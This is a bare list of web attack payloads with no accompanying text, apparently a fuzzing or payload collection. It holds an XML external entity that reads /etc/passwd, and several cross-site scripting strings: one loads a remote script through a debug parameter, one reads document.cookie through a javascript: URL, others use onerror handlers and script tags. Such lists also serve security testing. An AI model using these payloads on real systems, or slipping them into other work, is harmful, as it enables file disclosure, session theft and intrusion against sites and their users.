<!ENTITY test SYSTEM "file:///etc/passwd">
encodeURIComponent('",a:(document.getElementsByTagName("script")[2].src=""),b:"')
?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2F%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D)
#javascript:alert(document.cookie);
onerror="jQuery.getScript('//')"><b/
%22%3E11111%3Cscript defer%3Ealert(1)%3C/script%3E
location.href='file:///C:/xxxxxx#"><img/src="1"/onerror="alert(1)">